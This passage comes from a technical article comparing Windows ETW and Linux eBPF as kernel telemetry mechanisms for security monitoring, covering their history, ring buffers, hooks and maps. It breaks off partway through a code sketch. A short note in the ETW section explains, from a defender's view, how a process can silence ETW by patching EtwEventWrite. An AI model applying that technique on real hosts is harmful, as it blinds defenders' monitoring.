&lt;h2&gt;1. The SOC Analyst Sees the Same Thing Twice&lt;/h2&gt;
&lt;p&gt;A Security Operations Center analyst opens two &lt;code&gt;Sysmon/Operational&lt;/code&gt; event channels side by side. One channel is streaming from a Red Hat Enterprise Linux host; the other is streaming from a Windows Server 2022 domain controller. The XML configuration is the same. The Event IDs are the same. A &lt;code&gt;ProcessCreate&lt;/code&gt; record from either host carries the same &lt;code&gt;Image&lt;/code&gt;, &lt;code&gt;CommandLine&lt;/code&gt;, &lt;code&gt;ParentImage&lt;/code&gt;, &lt;code&gt;IntegrityLevel&lt;/code&gt;, and &lt;code&gt;Hashes&lt;/code&gt; fields. Detection rules written against one channel match the other. To the analyst, the two operating systems are interchangeable.&lt;/p&gt;
&lt;p&gt;Underneath, they are not even close.&lt;/p&gt;
&lt;p&gt;On the Windows side, every event was emitted by a kernel provider -- &lt;code&gt;Microsoft-Windows-Sysmon&lt;/code&gt;, &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt;, &lt;code&gt;Microsoft-Windows-Kernel-Process&lt;/code&gt; -- before the Sysmon user-mode service ever ran its XML filter. The kernel produced a fully formatted event, dropped it into a per-CPU ring buffer, and let user space pick it up. Every enabled event made the kernel-to-user trip in full. The filter inside Sysmon&apos;s user-mode service is what kept the on-disk log small. The wire between the kernel and the consumer carried the full firehose.&lt;/p&gt;
&lt;p&gt;On the Linux side, no kernel module owned by Microsoft is running. The same Sysmon binary is attached to roughly twenty Linux kernel probes through the &lt;code&gt;SysinternalsEBPF&lt;/code&gt; library [@github-com-microsoft-sysmonforlinux]. Each probe is an eBPF program: bytecode that was compiled by clang, verified by the kernel before load, JIT-compiled to native instructions, and attached to a hook inside the kernel [@ebpf-io-is-ebpf]. When &lt;code&gt;execve&lt;/code&gt; fires, the verified program runs on the producing CPU, reads its arguments out of the kernel context, decides whether the call matches the XML configuration&apos;s predicates, and -- only then -- writes a record into a ring buffer. The events that arrive in user space were already filtered inside the kernel. The wire carries only what the configuration cares about.&lt;/p&gt;
&lt;p&gt;The output channels match because Sysmon for Linux is engineered to look exactly like Sysmon for Windows [@github-com-microsoft-sysmonforlinux]. The substrate underneath is engineered for two different decades. ETW is from 2000. eBPF is from 2014. The fourteen-year gap shows up not in features but in &lt;em&gt;how the kernel does its job&lt;/em&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; ETW emits. eBPF computes. That gap is the entire generation difference. Everything else in this article is a consequence of it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This article is about why those two designs exist, why the second one is strictly more powerful, why &quot;strictly more powerful&quot; cost the Linux kernel a new class of CVE, and what Microsoft&apos;s &lt;code&gt;microsoft/ebpf-for-windows&lt;/code&gt; [@github-com-for-windows] project -- now in its sixth year of development -- reveals about which design wins at the point of convergence. By the end you will know both substrates well enough to choose between them, understand their failure modes, and see why &quot;two generations&quot; is not marketing language but a literal description of the engineering arc.&lt;/p&gt;
&lt;h2&gt;2. A Tale of Two Lineages&lt;/h2&gt;
&lt;p&gt;In 1992, Van Jacobson and Steven McCanne at Lawrence Berkeley Laboratory wrote a small virtual machine for packet filtering [@tcpdump-org-bpf-usenix93pdf]. In 2000, a separate Microsoft team shipped a kernel event bus inside Windows 2000. Neither group knew the other existed. Each was solving a different version of the same problem: &lt;em&gt;how do you watch the kernel from user space without owning the kernel?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The two answers ran in parallel for twenty-two years before they collided.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1992 -- The BSD Packet Filter.&lt;/strong&gt; McCanne and Jacobson published &quot;The BSD Packet Filter: A New Architecture for User-level Packet Capture&quot; at USENIX Winter 1993, describing work that landed in 4.3BSD-Reno earlier in 1992. The motivation was painfully concrete: &lt;code&gt;tcpdump&lt;/code&gt; was copying every packet through the kernel-user boundary, then discarding the ones the user did not want. BPF moved that filter into the kernel. A tiny two-register, 32-bit virtual machine evaluated a user-supplied predicate against each packet before any copy; only matching packets crossed into user space. The architectural insight that would survive thirty years is one sentence: &lt;em&gt;filter where the data is produced, not where it is consumed.&lt;/em&gt;&lt;/p&gt;

A safe, sandboxed virtual machine inside the Linux kernel that runs user-supplied programs at attached hook points. Programs are written in restricted C, compiled to a 64-bit RISC-style bytecode, statically verified before load, and JIT-compiled to native code. The &quot;extended&quot; version, introduced in Linux 3.18 (December 2014) [@kernel-org-bpf-indexhtml], generalized BPF from a packet-filter language into a general kernel-extensibility mechanism.
&lt;p&gt;&lt;strong&gt;2000 -- Event Tracing for Windows.&lt;/strong&gt; Microsoft shipped ETW with Windows 2000. The reference portal [@learn-microsoft-com-tracing-portal] describes the design Microsoft had been refining since the late 1990s: a kernel-mediated event bus with three roles -- providers, sessions, and consumers -- and per-CPU lock-free ring buffers. ETW&apos;s architectural insight was the inverse of BPF&apos;s: &lt;em&gt;event identity and causal order are first-class. A kernel-mediated dispatch makes them cheap.&lt;/em&gt; A &lt;code&gt;tcpdump&lt;/code&gt; filter wants to throw events away. A security telemetry system wants to keep them, attribute them, and order them.&lt;/p&gt;

A kernel-mediated tracing facility shipped in Windows 2000. Providers (kernel or user-mode components) emit structured events to per-CPU ring buffers; sessions own the buffers and select which providers to enable at which level; consumers receive the event stream either in real time or by reading the on-disk `.etl` log. ETW is documented at `learn.microsoft.com/.../etw/event-tracing-portal` [@learn-microsoft-com-tracing-portal].
&lt;p&gt;&lt;strong&gt;2003-2005 -- DTrace.&lt;/strong&gt; Bryan Cantrill, Mike Shapiro, and Adam Leventhal at Sun Microsystems started work in 2003 on what would become the first production-grade dynamic tracing system. DTrace shipped publicly in Solaris 10 in January 2005 [@en-wikipedia-org-wiki-dtrace] and quickly ported to FreeBSD and macOS. Its central idea -- safe in-kernel scripts attached to probes, with a single language for tracing the entire system -- is the spiritual ancestor of every modern kernel observability tool, including eBPF.Wikipedia gives DTrace&apos;s initial public release as January 2005, with Sun&apos;s internal development starting around 2003. The &quot;DTrace 2003&quot; claim that appears in some retrospectives conflates project inception with public release; we use the 2005 ship date here and note 2003 only as a development start. Linux could not adopt it directly: DTrace is licensed under the CDDL, which is GPLv2-incompatible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2005 -- SystemTap.&lt;/strong&gt; Red Hat attempted to fill the Linux DTrace gap with SystemTap [@sourceware-org-systemtap]. The architectural compromise that doomed it: SystemTap scripts compile to a &lt;em&gt;kernel module&lt;/em&gt;, loaded at runtime. Allowing user-supplied kernel modules to be loaded on demand is a privileged operation by definition, so production SystemTap deployments restricted use to local root. That made the observability case study moot: if you already have root, you can use any debugging tool. SystemTap survives as a niche tracing system; it did not become the Linux answer to DTrace.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1992-2014 -- classic BPF stagnates.&lt;/strong&gt; The original BPF VM kept finding new jobs. Linux Socket Filtering [@kernel-org-networking-filtertxt] ported the BSD filter into the Linux kernel in 1997. seccomp-bpf in 2012 gave it a second job: filtering system calls for sandboxing. But the language remained a 32-bit two-register packet-filter VM. It could not be extended to general kernel observability without rewriting the instruction set architecture from the ground up.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2014 -- eBPF.&lt;/strong&gt; Alexei Starovoitov&apos;s &quot;extended BPF&quot; patch series landed in Linux 3.18 in December 2014 [@kernel-org-bpf-indexhtml], described in LWN&apos;s contemporaneous article on Starovoitov&apos;s eBPF patch set [@lwn-net-articles-603983]. The rewrite was thorough: 64-bit instruction set, eleven registers, maps for in-kernel state, helper calls into kernel APIs, a JIT compiler, and -- the part that mattered most -- a kernel verifier that statically proves safety before any program runs. The verifier is what turned the packet filter into a general kernel extension mechanism. Without it, every BPF program would have to be trusted; with it, untrusted user code can execute in kernel mode.&lt;/p&gt;
&lt;p&gt;By the time eBPF shipped, Windows had ETW everywhere. Linux had &lt;code&gt;auditd&lt;/code&gt;&apos;s pull-based audit log and a handful of &lt;code&gt;perf&lt;/code&gt; events. Then Starovoitov rewrote BPF, and the architectural balance shifted overnight. The next decade of Linux observability was built on the new instruction set. The next decade of Windows observability stayed on ETW. The two designs ran in parallel until 2021, when Microsoft announced that eBPF would also run on Windows.&lt;/p&gt;

flowchart LR
    A[BPF -- 1992 -- LBL]
    B[ETW -- 2000 -- Windows 2000]
    C[DTrace -- 2005 -- Solaris 10]
    D[SystemTap -- 2005 -- Red Hat]
    E[seccomp-bpf -- 2012 -- Linux 3.5]
    F[eBPF -- 2014 -- Linux 3.18]
    G[BPF Trampoline -- 2019 -- Linux 5.5]
    H[BPF Ringbuf -- 2020 -- Linux 5.8]
    I[eBPF for Windows -- 2021 -- Microsoft]
    J[RFC 9669 BPF ISA -- 2024 -- IETF]
    A --&amp;gt; B --&amp;gt; C --&amp;gt; D --&amp;gt; E --&amp;gt; F --&amp;gt; G --&amp;gt; H --&amp;gt; I --&amp;gt; J
&lt;p&gt;The diagram lays the substrate stories side by side. Each arrow is an architectural decision that constrained what came after. The next two sections walk each design end to end -- ETW first, because it is older and emission-only and easier to internalize.&lt;/p&gt;
&lt;h2&gt;3. ETW: Pure Event Emission&lt;/h2&gt;
&lt;p&gt;A natural question that turns out to be the wrong one: &lt;em&gt;why didn&apos;t Microsoft just keep extending performance counters?&lt;/em&gt; By the late 1990s, Windows already had a mature counter facility -- &lt;code&gt;perfmon&lt;/code&gt;, the Windows Performance Counters portal [@learn-microsoft-com-counters-portal]. It exposed CPU percentage, page-fault rate, queue lengths, and hundreds of other scalar metrics. If you wanted to know how loaded your system was, perfmon told you.&lt;/p&gt;
&lt;p&gt;It also told you almost nothing useful for security telemetry.&lt;/p&gt;

Three structural failures of the counter model show up the moment you try to use it as the substrate for an EDR.&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Sampling-rate floor.&lt;/strong&gt; A counter can only be observed at the rate the consumer queries. On a busy host -- sshd children, container init forks, a CI runner -- process-creation rates routinely exceed any sane query rate. The counter aggregates the events it cannot expose into a single integer that hides the structure of what happened.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No identity.&lt;/strong&gt; &quot;Three hundred process creations in the last second&quot; is a counter. &quot;User &lt;code&gt;bob&lt;/code&gt; ran &lt;code&gt;/tmp/.x&lt;/code&gt; with parent &lt;code&gt;/usr/sbin/cron&lt;/code&gt; at 14:33:07.221Z&quot; is an event. The security model requires identity; the counter model erases it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No causal order.&lt;/strong&gt; Two counters sampled in sequence are not causally ordered with respect to the system events they describe. ETW&apos;s per-CPU buffers with QPC timestamps preserve causal order across CPUs to within the timer&apos;s accuracy.&lt;/li&gt;&lt;/ol&gt;

&lt;p&gt;The fix was not a faster perfmon. The fix was an entirely different shape of telemetry. ETW was that shape: push-based, per-event, kernel-attributed, with stable schemas declared up front. The contrast between perfmon (a sampling counter) and ETW (an event bus) is not parametric. The two systems answer different questions. Security needs the event-bus answer.&lt;/p&gt;
&lt;h3&gt;Provider, session, consumer&lt;/h3&gt;
&lt;p&gt;ETW&apos;s data plane has three roles, every one of them a kernel-mediated object.&lt;/p&gt;
&lt;p&gt;A &lt;em&gt;provider&lt;/em&gt; is a kernel or user-mode component that calls &lt;code&gt;EventWrite&lt;/code&gt; or &lt;code&gt;EtwWrite&lt;/code&gt; to emit a structured event. Providers identify themselves by GUID. They declare the schema of their events ahead of time: classic providers via MOF, the Vista-and-later manifest format [@learn-microsoft-com-event-tracing] called &lt;code&gt;WEVT&lt;/code&gt;, or TraceLogging [@learn-microsoft-com-logging-portal] for self-describing events. The schema is part of the contract: a consumer that knows the provider&apos;s manifest knows the field layout of every event the provider will ever emit.&lt;/p&gt;
&lt;p&gt;A &lt;em&gt;session&lt;/em&gt; is a kernel object created by &lt;code&gt;StartTrace&lt;/code&gt;. It owns a set of per-CPU buffers and a list of enabled providers, with per-provider level and keyword masks. Sessions can write events to disk (&lt;code&gt;.etl&lt;/code&gt; files) or be consumed in real time.The &lt;code&gt;.etl&lt;/code&gt; file extension stands for &quot;Event Trace Log.&quot; It is the on-disk format read by Windows Performance Analyzer and by &lt;code&gt;tracerpt.exe&lt;/code&gt; for post-hoc analysis.&lt;/p&gt;
&lt;p&gt;A &lt;em&gt;consumer&lt;/em&gt; is a user-mode process that calls &lt;code&gt;OpenTrace&lt;/code&gt; and &lt;code&gt;ProcessTrace&lt;/code&gt; and receives event callbacks. EDR agents like Sysmon, Defender, and the third-party agents that ship with Microsoft Defender for Endpoint [@learn-microsoft-com-defender-endpoint] are real-time consumers.&lt;/p&gt;

ETW&apos;s three-role architecture. *Providers* emit events into per-CPU ring buffers. *Sessions* are kernel objects that own buffers and select which providers to enable. *Consumers* are user-mode processes that read the buffers in real time or open the on-disk `.etl` file. The taxonomy is defined in the ETW provider documentation [@learn-microsoft-com-event-tracing].
&lt;h3&gt;The per-CPU ring buffer&lt;/h3&gt;
&lt;p&gt;The algorithmic core of ETW is a per-CPU lock-free ring buffer. When a provider on CPU 3 calls &lt;code&gt;EventWrite&lt;/code&gt;, the kernel formats the event according to the provider&apos;s manifest, stamps it with a QPC timestamp, and &lt;code&gt;memcpy&lt;/code&gt;s the result into the per-CPU buffer for CPU 3. A kernel writer thread drains the buffer asynchronously into the session&apos;s destination -- either an &lt;code&gt;.etl&lt;/code&gt; file on disk or a consumer&apos;s callback queue. The producer-side cost is constant: a function call plus a buffered &lt;code&gt;memcpy&lt;/code&gt;, all on the local CPU, with no cross-CPU synchronization.&lt;/p&gt;

The Windows monotonic timestamp source used for ETW event timestamps. QPC is backed by hardware timers (TSC on modern x86, generic counter on ARM64) and provides a high-resolution counter that does not go backward.
&lt;p&gt;QPC guarantees monotonic timestamps per CPU.QPC is monotonic per CPU on modern hardware, but cross-CPU ordering still relies on the kernel writer thread&apos;s serialization when events from different CPUs are merged into a single output stream. Per-event timestamps from different CPUs can be ordered after the fact, but the merge happens in the writer, not in the producer.&lt;/p&gt;

flowchart LR
    P1[Provider on CPU 0]
    P2[Provider on CPU 1]
    P3[Provider on CPU 2]
    B0[Per-CPU buffer 0]
    B1[Per-CPU buffer 1]
    B2[Per-CPU buffer 2]
    W[Kernel writer thread]
    S[Session]
    F[.etl file]
    C[Real-time consumer]
    P1 -- EventWrite --&amp;gt; B0
    P2 -- EventWrite --&amp;gt; B1
    P3 -- EventWrite --&amp;gt; B2
    B0 --&amp;gt; W
    B1 --&amp;gt; W
    B2 --&amp;gt; W
    W --&amp;gt; S
    S --&amp;gt; F
    S --&amp;gt; C
&lt;h3&gt;The cost story&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s reference portal [@learn-microsoft-com-tracing-portal] describes ETW as &quot;high-volume, low-overhead.&quot; That qualitative claim has been the consensus practitioner finding for two decades. The most useful practical writeup is Bruce Dawson&apos;s &lt;em&gt;ETW Central&lt;/em&gt; index [@randomascii-wordpress-com-etw-central], which links to more than forty blog posts on real ETW deployments and measurements. The honest summary, anchored to Dawson&apos;s practical experience plus the architectural reason (per-CPU lock-free buffers and a &lt;code&gt;memcpy&lt;/code&gt; per event), is that typical telemetry configurations sit in the low single-digit-percent CPU range, and pathological &quot;log everything&quot; configurations can reach measurable user-visible slowdowns -- on the order of 5-10% in the worst cases. These are practitioner estimates, not benchmarked figures; the BenchmarkDotNet documentation [@benchmarkdotnet-org-configs-diagnosershtml] for the &lt;code&gt;EtwProfiler&lt;/code&gt; diagnoser explicitly acknowledges the cost: &lt;em&gt;&quot;In order to not affect main results we perform a separate run if any diagnoser is used.&quot;&lt;/em&gt; The overhead is small but it is not zero.&lt;/p&gt;
&lt;p&gt;The cost has a structural cause. ETW has no in-kernel filter. The producer pays the full event-formatting cost on every emission, and the only filter is the session&apos;s level and keyword mask. If you enable a provider, every event that provider emits flows through the buffer. Filtering happens at the consumer, in user mode, after the event has crossed the boundary.&lt;/p&gt;
&lt;h3&gt;The Threat-Intelligence provider&lt;/h3&gt;
&lt;p&gt;ETW providers are not equal. The most architecturally important one for security is &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt;, a kernel-only provider that emits signals only the kernel can see: image loads, remote-thread creations, &lt;code&gt;VirtualProtect&lt;/code&gt; changes that flip memory from data to executable. Only a process running under Protected Process Light with the AntiMalware signer [@learn-microsoft-com-downloads-sysmon] can subscribe. That is why Defender, CrowdStrike Falcon, SentinelOne, and Carbon Black [@github-com-providers-docs] all run as PPL-Antimalware: it is the entry ticket to the kernel-only telemetry that distinguishes serious EDR from script-level monitoring.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; ETW&apos;s biggest weakness is that providers run inside the very process they are observing. A process can patch its own copy of &lt;code&gt;ntdll!EtwEventWrite&lt;/code&gt; with a &lt;code&gt;ret&lt;/code&gt; instruction and silence its own emissions before they reach the kernel buffer. EDR vendors monitor for this integrity violation out of band, treating the patch itself as a high-confidence detection signal. The very existence of the tell is an admission that ETW&apos;s original design assumed an honest user-mode producer -- a reasonable assumption in 2000, increasingly untenable in 2025.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Sysmon 6.20 [@learn-microsoft-com-downloads-sysmon], released in 2018, was the version that tied ETW into the modern EDR stack as a turnkey configuration.The 2018 Sysmon 6.20 release added the configuration schema that the cybersecurity community converged on. By 2026, the same XML configuration -- including the &lt;code&gt;ProcessCreate&lt;/code&gt;, &lt;code&gt;NetworkConnect&lt;/code&gt;, &lt;code&gt;ImageLoad&lt;/code&gt;, and &lt;code&gt;FileCreate&lt;/code&gt; event IDs -- works on both Sysmon for Windows and Sysmon for Linux. Sysmon, Microsoft&apos;s own free reference consumer authored by Mark Russinovich and Thomas Garnier [@learn-microsoft-com-downloads-sysmon], demonstrated that an XML configuration plus an ETW consumer plus protected-process status was enough to build a useful EDR. Sysmon is not Defender; it is the open shape that the commercial EDR vendors built proprietary versions of.&lt;/p&gt;
&lt;h3&gt;Closing on ETW&lt;/h3&gt;
&lt;p&gt;ETW emits. Every enabled event crosses the kernel-user boundary, fully formatted, with no in-kernel filtering language whatsoever. The session&apos;s level and keyword mask is a coarse on/off switch, not a programmable filter. Aggregation, sampling, and stack-trace folding happen in user mode, after the event is already across the boundary.&lt;/p&gt;
&lt;p&gt;Now you can read the question that drove Starovoitov&apos;s 2014 rewrite: &lt;em&gt;what if you could filter in the kernel itself? What if you could compute -- not just emit?&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;4. eBPF: Programmable In-Kernel Computation&lt;/h2&gt;
&lt;p&gt;The architectural inversion is one sentence. ETW is the producer telling the consumer what happened. eBPF is the consumer telling the producer what to compute. The producer is the kernel; the consumer is a user-mode process that has compiled, verified, and attached a small program that will run inside the kernel at a chosen hook. The roles are inverted, the data flow is inverted, and the trust model is inverted.&lt;/p&gt;
&lt;h3&gt;The lifecycle&lt;/h3&gt;
&lt;p&gt;A canonical eBPF program goes through six stages before it does any useful work. The flow below is the same on every Linux kernel since 3.18, with refinements added over the years for BTF (BPF Type Format), CO-RE (Compile Once, Run Everywhere), and link primitives:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;1. clang -target bpf -O2 -c prog.c -o prog.o            # ELF with BTF
2. fd = bpf(BPF_PROG_LOAD, &amp;amp;attr)                       # kernel verifier runs
3. for each map referenced:
       map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr)
4. link = bpf(BPF_LINK_CREATE, kprobe|tracepoint|xdp|lsm|cgroup, fd)
5. at hook fire: JIT-compiled native code runs on the
   producing CPU, reads context, calls bpf_* helpers,
   writes to map or ringbuf
6. user space mmaps the ringbuf and consumes records
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The lifecycle is documented in the canonical kernel BPF documentation index [@kernel-org-bpf-indexhtml]. It is worth lingering on stage 2. Between the user-space &lt;code&gt;bpf()&lt;/code&gt; syscall and the moment the kernel hands back a file descriptor for the loaded program, a static analyzer runs. That analyzer is the most consequential piece of code in this entire article. We treat it on its own in section 5.&lt;/p&gt;

flowchart TD
    A[&quot;Restricted C source -- (prog.c)&quot;]
    B[&quot;clang -target bpf -- BPF ELF + BTF&quot;]
    C[bpf BPF_PROG_LOAD]
    D[Kernel verifier]
    E[JIT compiler]
    F[Kernel hook]
    G[bpf BPF_MAP_CREATE]
    H[&quot;BPF maps -- (arrays, hashes, ringbuf)&quot;]
    I[&quot;bpf BPF_LINK_CREATE -- (kprobe/xdp/lsm/...)&quot;]
    J[Hook fires]
    K[User space mmap ringbuf]
    A --&amp;gt; B --&amp;gt; C --&amp;gt; D
    D --&amp;gt;|reject| Z[E_INVAL to userspace]
    D --&amp;gt;|accept| E --&amp;gt; F
    C --&amp;gt; G --&amp;gt; H
    F --&amp;gt; I --&amp;gt; J
    J --&amp;gt; H
    H --&amp;gt; K
&lt;h3&gt;Hooks: where programs attach&lt;/h3&gt;
&lt;p&gt;The thing that distinguishes eBPF from a packet filter is its hook surface. A &lt;em&gt;hook&lt;/em&gt; is a place inside the kernel where a verified program can be attached, fired at the moment something happens. Linux has a lot of hooks.&lt;/p&gt;

An attachment point in kernel code where a verified eBPF program runs. Different hook types receive different context arguments: a kprobe receives the function&apos;s CPU registers; an XDP program receives a packet buffer; an LSM hook receives the security operation&apos;s parameters. The hook type also determines what helpers and map types the verifier allows.
&lt;p&gt;The hook taxonomy, drawn from the kernel BPF docs [@kernel-org-bpf-indexhtml] and Cilium&apos;s BPF architecture reference [@docs-cilium-io-bpf-architecture], is broad:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;kprobe&lt;/code&gt; and &lt;code&gt;kretprobe&lt;/code&gt; -- entry and return of any non-inlined kernel function.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fentry&lt;/code&gt; and &lt;code&gt;fexit&lt;/code&gt; -- BPF trampoline replacement for kprobes, with no &lt;code&gt;int3&lt;/code&gt; trap-frame cost.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;uprobe&lt;/code&gt; -- any user-space symbol in any process.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;tracepoint&lt;/code&gt; -- stable kernel tracepoints with version-locked schemas.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;perf_event&lt;/code&gt; -- sampling-profile hooks tied to perf events.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;XDP&lt;/code&gt; -- driver tail-call, before allocation of an &lt;code&gt;sk_buff&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;TC&lt;/code&gt; -- Linux traffic-control qdisc hooks.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;LSM&lt;/code&gt; -- Linux Security Module hooks (mandatory-access-control points), available since Linux 5.7.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cgroup&lt;/code&gt;, &lt;code&gt;sched&lt;/code&gt;, &lt;code&gt;sock_ops&lt;/code&gt; -- policy and socket-state hooks.&lt;/li&gt;
&lt;/ul&gt;

flowchart TD
    K[&quot;eBPF -- Programs&quot;]
    T[&quot;Tracing -- (kprobe, fentry, -- uprobe, tracepoint)&quot;]
    N[&quot;Networking -- (XDP, TC, sock_ops, -- sk_lookup)&quot;]
    S[&quot;Security -- (LSM, seccomp, -- landlock)&quot;]
    P[&quot;Policy &amp;amp; scheduling -- (cgroup, sched, -- perf_event)&quot;]
    K --&amp;gt; T
    K --&amp;gt; N
    K --&amp;gt; S
    K --&amp;gt; P
&lt;p&gt;That hook surface is what makes eBPF the universal Linux instrumentation substrate. Once a developer learns the load-verify-attach lifecycle, the same toolchain instruments a TCP retransmit, a &lt;code&gt;do_sys_open&lt;/code&gt; call, an LSM &lt;code&gt;file_open&lt;/code&gt; check, and an XDP fast-path drop -- all in the same language with the same verifier and the same JIT.&lt;/p&gt;
&lt;h3&gt;Maps: in-kernel state&lt;/h3&gt;
&lt;p&gt;The second piece of architecture eBPF adds over classic BPF is the &lt;em&gt;map&lt;/em&gt; -- a kernel-managed key-value store accessible from inside a verified program and from user space. Maps are how eBPF programs hold state between invocations and how they communicate with user space.&lt;/p&gt;

A kernel-managed data structure that an eBPF program can read and write from inside the kernel, and a user-space process can read and write through the `bpf()` syscall. Common map types include hash, array, LRU hash, per-CPU hash, ring buffer, and program array (used for tail calls). Each map has a maximum capacity declared at creation and a verifier-checked size for keys and values.
&lt;p&gt;The kernel hash-map documentation [@docs-kernel-org-bpf-maphashhtml] distinguishes shared and per-CPU variants. The decision between them is one of the consequential design choices in writing real eBPF code.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Map type&lt;/th&gt;
&lt;th&gt;Cross-CPU semantics&lt;/th&gt;
&lt;th&gt;Update cost&lt;/th&gt;
&lt;th&gt;Memory cost&lt;/th&gt;
&lt;th&gt;Best for&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;BPF_MAP_TYPE_HASH&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;One value per key, shared across CPUs&lt;/td&gt;
&lt;td&gt;Atomic &lt;code&gt;__sync_fetch_and_add&lt;/code&gt; or &lt;code&gt;BPF_F_LOCK&lt;/code&gt; spinlock&lt;/td&gt;
&lt;td&gt;&lt;code&gt;max_entries * (key_size + value_size)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;State that must be globally consistent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;BPF_MAP_TYPE_PERCPU_HASH&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Separate value slot per CPU&lt;/td&gt;
&lt;td&gt;Non-atomic read-modify-write&lt;/td&gt;
&lt;td&gt;&lt;code&gt;max_entries * value_size * num_cpus&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Counters and histograms where rate matters and snapshot consistency does not&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;BPF_MAP_TYPE_RINGBUF&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Single MPSC ring with global FIFO order&lt;/td&gt;
&lt;td&gt;Reservation-spinlock on producer&lt;/td&gt;
&lt;td&gt;Fixed buffer&lt;/td&gt;
&lt;td&gt;Event streams whose user-space order must match cross-CPU producer order&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The per-CPU variant exists because cache-coherence cost on a contended hash slot dominates the time spent updating it; per-CPU maps remove that contention entirely at the price of cross-CPU consistency. A per-CPU counter on a 96-vCPU host occupies &lt;code&gt;96 * value_size&lt;/code&gt; bytes per key, but updates are local loads and stores. A shared counter on the same host is &lt;code&gt;value_size&lt;/code&gt; bytes per key, but every increment is an atomic.&lt;/p&gt;

A multi-producer single-consumer kernel-to-user transport added in Linux 5.8 and documented at `docs.kernel.org/bpf/ringbuf.html` [@docs-kernel-org-bpf-ringbufhtml]. Unlike the legacy `perf_event_array` (one ring per CPU), the BPF ringbuf is a single ring shared across all CPUs, with cross-CPU producer ordering preserved in the user-visible record stream.
&lt;p&gt;The ringbuf documentation [@docs-kernel-org-bpf-ringbufhtml] is explicit about why the design exists: &lt;em&gt;&quot;more efficient memory use by sharing ring buffer across CPUs; preserving ordering of events that happen sequentially in time, even across multiple CPUs (e.g., fork/exec/exit events for a task).&quot;&lt;/em&gt; A security telemetry consumer that needs to see &lt;code&gt;fork&lt;/code&gt; on CPU 0 before &lt;code&gt;kill&lt;/code&gt; on CPU 1 cannot use a per-CPU ring; it needs a single MPSC ring. The trade-off is real: the producer pays a brief spinlock for slot reservation, where a per-CPU ring would pay nothing. For event streams the trade is worth it; for histograms it is not.&lt;/p&gt;
&lt;h3&gt;The aggregation pattern&lt;/h3&gt;
&lt;p&gt;The reason eBPF is strictly more powerful than ETW is captured in one bpftrace one-liner. The DSL &lt;code&gt;bpftrace&lt;/code&gt; [@github-com-iovisor-bpftrace] -- inspired explicitly by DTrace -- compiles a single-line query into a verified eBPF program:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bpftrace&quot;&gt;kprobe:vfs_read { @[comm] = hist(arg2); }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This program attaches to the &lt;code&gt;vfs_read&lt;/code&gt; kernel function. For every call, it indexes a per-CPU map by the calling process&apos;s name (&lt;code&gt;comm&lt;/code&gt;), buckets the &lt;code&gt;arg2&lt;/code&gt; value (the read length) into a power-of-two histogram, and increments the bucket. Nothing crosses the kernel-user boundary while &lt;code&gt;vfs_read&lt;/code&gt; is firing -- not at 10K calls per second, not at 10M. When the user hits Ctrl-C, bpftrace iterates the per-CPU maps from user space, merges the buckets across CPUs, and prints a histogram.&lt;/p&gt;
&lt;p&gt;ETW cannot do this. To produce the same histogram with ETW, a consumer would have to subscribe to every &lt;code&gt;vfs_read&lt;/code&gt;-equivalent kernel event, receive each one in user mode, compute its bucket, and update an in-process histogram. The kernel-user wire would carry the full firehose. eBPF carries only the final histogram.&lt;/p&gt;
&lt;p&gt;{`
// The bpftrace one-liner:
//   kprobe:vfs_read { @[comm] = hist(arg2); }
// lowers (conceptually) to this kernel-side and user-side flow.&lt;/p&gt;
&lt;p&gt;// --- inside the kernel, at every vfs_read call ---
function on_vfs_read(ctx) {
  const comm = bpf_get_current_comm();
  const len  = ctx.regs.rsi;                  // arg2: read length
  const bucket = log2(len);                   // 0..63&lt;/p&gt;
&lt;p&gt;  // per-CPU hash keyed by (comm, bucket); no cross-CPU atomics.
  const key = { comm, bucket };
  const slot = percpu_map.lookup_or_init(key, 0);
  *slot += 1;
}&lt;/p&gt;
&lt;p&gt;// --- in user space, on Ctrl-C ---
function print_histogram() {
  const merged = {};
  for (const cpu of all_cpus) {
